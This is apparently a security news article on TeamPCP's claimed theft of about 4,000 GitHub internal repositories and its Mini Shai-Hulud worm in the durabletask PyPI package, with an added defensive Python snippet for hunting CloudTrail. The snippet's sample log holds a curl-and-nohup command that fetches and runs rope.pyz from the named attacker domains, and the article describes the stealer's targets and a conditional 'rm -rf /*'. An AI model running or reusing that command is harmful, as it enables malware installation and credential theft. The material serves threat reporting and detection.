GitHub Investigating TeamPCP Claimed Breach of ~4,000 Internal Repositories
The Hacker News
Ravie Lakshmanan | May 20, 2026 | Malware / Cloud Security
GitHub on Tuesday said it's investigating unauthorized access to its internal repositories after the notorious threat actor known as TeamPCP listed the platform's source code and internal organizations for sale on a cybercrime forum.
"While we currently have no evidence of impact to customer information stored outside of GitHub's internal repositories (such as our customers' enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity," the Microsoft-owned subsidiary said.
The company also noted that it will notify customers via established incident response and notification channels if any impact is discovered.
The development comes after TeamPCP, a threat actor behind a string of software supply chain attacks targeting open-source packages, listed GitHub's source code for sale for an asking price of no less than $50,000. The alleged data dump is said to include about 4,000 repositories.
"As always, this is not a ransom," the group said in a post, according to screenshots shared by Dark Web Informer. "We do not care about extorting GitHub, 1 buyer and we shred the data on our end, it looks like our retirement is soon so if no buyer is found, we leak it for free."
In a follow-up update shared on X, GitHub said it detected and contained a compromise of an employee device involving a poisoned Microsoft Visual Studio Code extension. As a risk mitigation measure, the company has rotated critical secrets, while prioritizing highest-impact credentials.
"Our current assessment is that the activity involved exfiltration of GitHub-internal repositories only," GitHub said. "The attacker's current claims of ~3,800 repositories are directionally consistent with our investigation so far."
GitHub did not disclose the name of the VS Code extension, although it's worth noting that Nx Console recently suffered a compromise that allowed threat actors to push a multi-stage credential stealer and a supply chain poisoning tool. The Nx team has since acknowledged that "very few users were compromised."
Following the incident, an X account linked to TeamPCP, xploitrsturtle2, stated: "GitHub knew for hours, they delayed telling you and they won't be honest in the future. What an amazing run, it's been an honor to play around with the cats over the past few months."
TeamPCP Compromises durabletask PyPI Package
News of the sale comes as TeamPCP's self-replicating malware campaign, known as Mini Shai-Hulud, continues to expand in reach with the compromise of durabletask, an official Microsoft Python client for the Durable Task workflow execution framework. Three malicious package versions have been identified: 1.4.1, 1.4.2, and 1.4.3.
"The attacker compromised a GitHub account via a previous attack, dumped GitHub secrets from a repository to which the user had access, and from there had access to the PyPi token to publish directly," Google-owned Wiz said.
The payload embedded into the package is a dropper, which is configured to fetch and run a second-stage payload ("rope.pyz") from an external server ("check.git-service[.]com"). The malware is assessed to be an evolution of the payload deployed in connection with the compromise of the guardrails-ai package last week.
Specifically, it's designed to activate a full-featured infostealer that's capable of harvesting credentials associated with major cloud providers, password managers, and developer tools, and exfiltrating the data to the attacker-controlled domain. It's worth noting that the stealer is configured to execute only on Linux systems.
According to SafeDep, the 28KB Python stealer also attempts to read HashiCorp Vault KV secrets, unlock and dump 1Password and Bitwarden password vaults, and access SSH keys, Docker credentials, VPN configurations, and shell history.
"If the machine is running inside AWS, it propagates itself to other EC2 instances using SSM. If it's inside Kubernetes, it propagates through kubectl exec," Aikido Security said. "And if it detects Israeli or Iranian system settings, there's a 1-in-6 chance it plays audio and then runs rm -rf /*."
"After enumerating SSM-managed instances, it uses SendCommand with the AWS-RunShellScript document to execute the rope.pyz payload on up to 5 other EC2 instances per profile," per StepSecurity. "The propagation script downloads the payload from the primary C2, falling back to the secondary domain t.m-kosche[.]com, and runs it in the background."
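As an added example that is not part of the article and not code from any of the vendors quoted, the following Python shows how a defender could hunt CloudTrail for the SSM propagation pattern described above: an `ssm:SendCommand` using the `AWS-RunShellScript` document, fanned out to several instances, whose shell text pulls the second stage from the domains named in the article. The sample records, account ID and instance IDs are constructed; the field names follow the SendCommand API request, and it is an assumption that a given trail logs the `parameters` block unredacted.

```python
# Constructed sample CloudTrail-style records, not real logs. Field names follow
# the SSM SendCommand API request; assumption: a real trail may redact "parameters".
SAMPLE_EVENTS = [
    {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ci-runner"},
     "requestParameters": {
         "documentName": "AWS-RunShellScript",
         "instanceIds": ["i-0a1", "i-0b2", "i-0c3", "i-0d4", "i-0e5"],
         "parameters": {"commands": [
             "curl -fsSL https://check.git-service.com/rope.pyz -o /tmp/rope.pyz"
             " || curl -fsSL https://t.m-kosche.com/rope.pyz -o /tmp/rope.pyz; "
             "nohup python3 /tmp/rope.pyz >/dev/null 2>&1 &"]}}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/ops-admin"},
     "requestParameters": {"documentName": "AWS-RunPatchBaseline",
                           "instanceIds": ["i-0a1"],
                           "parameters": {"Operation": ["Install"]}}},
    {"eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ci-runner"}},
]

# Indicators quoted in the article, with the defanging brackets removed.
C2_DOMAINS = ("check.git-service.com", "t.m-kosche.com")
PAYLOAD_NAME = "rope.pyz"

def flag_ssm_propagation(events, fanout_threshold=3):
    """One finding per ssm:SendCommand that looks like the worm's spread: AWS-RunShellScript
    fanned out to several instances and/or shell text pulling the known second stage."""
    findings = []
    for ev in events:
        if ev.get("eventSource") != "ssm.amazonaws.com" or ev.get("eventName") != "SendCommand":
            continue
        req = ev.get("requestParameters") or {}
        if req.get("documentName") != "AWS-RunShellScript":
            continue
        shell = " ".join((req.get("parameters") or {}).get("commands", []))
        targets = req.get("instanceIds") or []
        ioc_hits = [d for d in C2_DOMAINS if d in shell]
        if PAYLOAD_NAME in shell:
            ioc_hits.append(PAYLOAD_NAME)
        reasons = [f"shell text references known indicator {h}" for h in ioc_hits]
        if len(targets) >= fanout_threshold:
            reasons.append(f"fan-out to {len(targets)} instances in one call")
        if reasons:  # an indicator hit is high; wide fan-out alone is only medium
            findings.append({"principal": ev["userIdentity"]["arn"], "instances": targets,
                             "severity": "high" if ioc_hits else "medium", "reasons": reasons})
    return findings
```

Fan-out without an indicator hit is reported at medium severity so that legitimate bulk administration is surfaced for review rather than auto-escalated.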
Also notable is the use of the FIRESCALE mechanism to identify a backup command-and-control (C2) address in the event the primary domain is unreachable. It does this by searching GitHub's public commit messages for the pattern "FIRESCALE <base64_url>.<base64_signature>" and extracting the C2 information from it. Details of this technique were previously highlighted by Hunt.io.
Because the worm propagates using tokens stolen from infected environments, the number of affected packages is expected to grow. Any machine or pipeline that installed an affected version of the package should be treated as fully compromised.
"The package is downloaded roughly 417,000 times a month, and the malicious code runs automatically the moment the package is imported, with no error messages and no visible signs of compromise," Endor Labs researcher Peyton Kennedy said.